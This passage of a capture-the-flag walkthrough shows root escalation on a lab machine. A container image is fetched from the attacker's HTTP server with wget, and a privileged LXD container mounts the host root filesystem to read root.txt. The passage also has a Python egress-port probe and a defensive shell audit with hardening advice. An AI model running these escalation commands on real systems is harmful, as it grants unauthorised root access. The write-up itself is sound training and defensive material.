But the download on the target fails: wget hangs at "Connecting" on port 8000 even though the target can ping the attacking machine, so the target's firewall appears to drop outbound connections to that port (the nmap result already showed it filtering inbound traffic). Restart the HTTP server on port 80, which is allowed through; binding a port below 1024 requires root, so run it with sudo:

floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:44:26--  http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ ping 192.168.56.206
PING 192.168.56.206 (192.168.56.206) 56(84) bytes of data.
64 bytes from 192.168.56.206: icmp_seq=1 ttl=64 time=0.324 ms
^C
--- 192.168.56.206 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.324/0.324/0.324/0.000 ms
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:25--  http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ wget http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:41--  http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_01 100%[=====================================================>]   3.11M  --.-KB/s    in 0.01s   

2022-12-09 08:45:41 (209 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

floki@vikings:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-apache2.service-SaueZS
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-resolved.service-hZO7PK
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-timesyncd.service-SI92UJ
floki@vikings:/tmp$ 
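The guess above, that the target's firewall drops port 8000, can be checked rather than assumed. The following is an added example, not part of the original write-up: a small Python probe meant to be run on the target (or any host behind an egress filter) that distinguishes a port whose SYN is silently dropped (wget hanging at "Connecting", typical of an iptables DROP rule) from one that is actively refused (an RST, from an iptables REJECT rule or simply nothing listening) and from one that is reachable. The host address and candidate port list are assumptions; the stand-alone demo uses a loopback listener because there is no firewall to talk to offline.

```python
import socket


def probe_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Classify a TCP connect attempt by how the network answered it.

    open        - three-way handshake completed
    closed      - RST received (nothing listening, or iptables REJECT)
    filtered    - silence until the timeout (iptables DROP; this is what a
                  wget stuck at "Connecting..." looks like)
    unreachable - the local stack could not even route the packet
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "unreachable"
    finally:
        sock.close()


def egress_report(host: str, ports=(80, 443, 8000, 8080), timeout: float = 2.0) -> dict:
    """Map each candidate port to its state; pick a serving port from the open ones.
    The default port list is an assumption, not something the target dictated."""
    return {port: probe_port(host, port, timeout) for port in ports}


def usable_ports(report: dict) -> list:
    """Ports a listener on the attacking machine could actually be reached on."""
    return [port for port, state in report.items() if state == "open"]


def listen_on_loopback():
    """Demo helper: a listener on an ephemeral loopback port, so the probe can be
    exercised without a real firewall. Returns (server_socket, port)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    return server, server.getsockname()[1]


if __name__ == "__main__":
    server, port = listen_on_loopback()
    print(f"port {port} while listening:", probe_port("127.0.0.1", port))
    server.close()
    print(f"port {port} after closing:  ", probe_port("127.0.0.1", port))
```

On the target you would call egress_report with the attacker's address (192.168.56.206 in this write-up); a port that comes back "filtered" while others are "open" confirms an outbound DROP rule rather than a problem with the HTTP server, and usable_ports tells you where to serve the file.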

floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool

It errors out, saying there is no storage pool, so initialize with the lxd command to create one:

floki@vikings:/tmp$ lxd init 
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
Error: Failed to create network 'lxdbr0': open /proc/sys/net/ipv6/conf/lxdbr0/autoconf: no such file or directory

Pressing Enter all the way through ends in an error saying the network cannot be created. I searched online for a fix and did not find a suitable one, so I took the quick and dirty approach: we simply do without the network, i.e. re-run the initialization and answer no at the step that creates the network bridge.

floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

This time lxd init completed without errors, which means the storage pool was created successfully, so run lxc again:

floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite

The container you are starting doesn't have any network attached to it.
  To create a new network, use: lxc network create
  To attach a network to a container, use: lxc network attach

floki@vikings:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
floki@vikings:/tmp$ lxc start ignite
floki@vikings:/tmp$ lxc exec ignite /bin/sh

Although it warns that no network is attached, the whole process proceeds without trouble, and we obtain a root shell:

/mnt # cd root
/mnt/root # ls -alh
total 2G     
drwxr-xr-x   24 root     root        4.0K Sep  3  2021 .
drwxr-xr-x    1 root     root           8 Dec  9 08:56 ..
drwxr-xr-x    2 root     root        4.0K Sep  4  2021 bin
drwxr-xr-x    4 root     root        4.0K Sep  4  2021 boot
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 cdrom
drwxr-xr-x   19 root     root        3.8K Dec  9 04:47 dev
drwxr-xr-x  105 root     root        4.0K Sep  4  2021 etc
drwxr-xr-x    4 root     root        4.0K Sep  3  2021 home
lrwxrwxrwx    1 root     root          34 Sep  3  2021 initrd.img -> boot/initrd.img-4.15.0-154-generic
lrwxrwxrwx    1 root     root          34 Sep  3  2021 initrd.img.old -> boot/initrd.img-4.15.0-154-generic
drwxr-xr-x   23 root     root        4.0K Sep  3  2021 lib
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 lib64
drwx------    2 root     root       16.0K Sep  3  2021 lost+found
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 media
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 mnt
drwxr-xr-x    3 root     root        4.0K Sep  3  2021 opt
dr-xr-xr-x  136 root     root           0 Dec  9 04:47 proc
drwx------    5 root     root        4.0K Sep  4  2021 root
drwxr-xr-x   29 root     root         980 Dec  9 08:55 run
drwxr-xr-x    2 root     root       12.0K Sep  4  2021 sbin
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 snap
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 srv
-rw-------    1 root     root        1.8G Sep  3  2021 swap.img
dr-xr-xr-x   13 root     root           0 Dec  9 04:47 sys
drwxrwxrwt   10 root     root        4.0K Dec  9 08:45 tmp
drwxr-xr-x   11 root     root        4.0K Sep  4  2021 usr
drwxr-xr-x   14 root     root        4.0K Sep  3  2021 var
lrwxrwxrwx    1 root     root          31 Sep  3  2021 vmlinuz -> boot/vmlinuz-4.15.0-154-generic
lrwxrwxrwx    1 root     root          31 Sep  3  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-154-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 48K    
drwx------    5 root     root        4.0K Sep  4  2021 .
drwxr-xr-x   24 root     root        4.0K Sep  3  2021 ..
lrwxrwxrwx    1 root     root           9 Sep  3  2021 .bash_history -> /dev/null
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwx------    3 root     root        4.0K Sep  3  2021 .cache
drwxr-xr-x    3 root     root        4.0K Sep  3  2021 .local
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
lrwxrwxrwx    1 root     root           9 Sep  3  2021 .python_history -> /dev/null
-rw-r--r--    1 root     root          66 Sep  3  2021 .selected_editor
drwx------    2 root     root        4.0K Sep  3  2021 .ssh
-rw-------    1 root     root        8.7K Sep  4  2021 .viminfo
-rw-------    1 root     root          33 Sep  3  2021 root.txt
/mnt/root/root # cat root.txt
f0b98d4387ff6da77317e582da98bf31
/mnt/root/root # 

With that, the root flag is obtained.
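From the defender's side, the escalation above depends on exactly two things: the user floki being a member of the lxd group (LXD's own documentation treats lxd group membership as equivalent to root), and a container created with security.privileged=true that mounts the host root with a disk device whose source is /. The following POSIX shell audit is an added example, not part of the original writeup or of LXD itself. It checks both conditions on text input so it runs offline; the two sample inputs are constructed to mirror the commands shown above. On a real host you would feed it the output of `getent group lxd` and `lxc config show <container> --expanded` instead.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit helpers that flag
# 1) non-root users in the lxd group and
# 2) a privileged container that mounts the host root filesystem.
# Inputs are passed as text so the checks run offline on constructed samples.

# Constructed sample of `getent group lxd` output (mirrors the writeup: floki is in lxd).
SAMPLE_GROUP='lxd:x:108:floki'

# Constructed sample of `lxc config show ignite --expanded` output, matching the
# `lxc init ... -c security.privileged=true` and `lxc config device add ... source=/`
# commands used above.
SAMPLE_CONFIG='config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
'

# lxd_group_members <getent-line>: print non-root members of the lxd group, one per line.
# Any user listed here can reach root on the host the same way floki did, so the
# expected (hardened) output is empty.
lxd_group_members() {
    printf '%s\n' "$1" | awk -F: '
        $1 == "lxd" && $4 != "" {
            n = split($4, u, ",")
            for (i = 1; i <= n; i++) if (u[i] != "root") print u[i]
        }'
}

# container_is_privileged <config-yaml>: succeed if security.privileged is true.
container_is_privileged() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*security\.privileged:[[:space:]]*"?true"?'
}

# container_mounts_host_root <config-yaml>: succeed if any device has source: /
# (the whole host filesystem, as opposed to a specific directory).
container_mounts_host_root() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*source:[[:space:]]*/[[:space:]]*$'
}

# audit_container <config-yaml>: print HIGH when both conditions hold (host root is
# writable as real root from inside the container), MEDIUM for either one, OK otherwise.
audit_container() {
    priv=0
    hostroot=0
    container_is_privileged "$1" && priv=1
    container_mounts_host_root "$1" && hostroot=1
    if [ "$priv" -eq 1 ] && [ "$hostroot" -eq 1 ]; then
        echo HIGH
    elif [ "$priv" -eq 1 ] || [ "$hostroot" -eq 1 ]; then
        echo MEDIUM
    else
        echo OK
    fi
}

# Run the audit on the constructed samples.
echo "lxd group members (should be empty):"
lxd_group_members "$SAMPLE_GROUP"
echo "container ignite: $(audit_container "$SAMPLE_CONFIG")"
```

The fix on the host side is to remove unprivileged users from the lxd group (`gpasswd -d <user> lxd`) and, for containers that legitimately need host storage, to expose a specific directory rather than `/` and keep `security.privileged` unset. A periodic run of `lxc list` followed by `lxc config show <name> --expanded` piped into `audit_container` catches a container like `ignite` as soon as it exists.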

Lessons learned

  1. When analyzing images, do not forget to include binwalk in the toolset.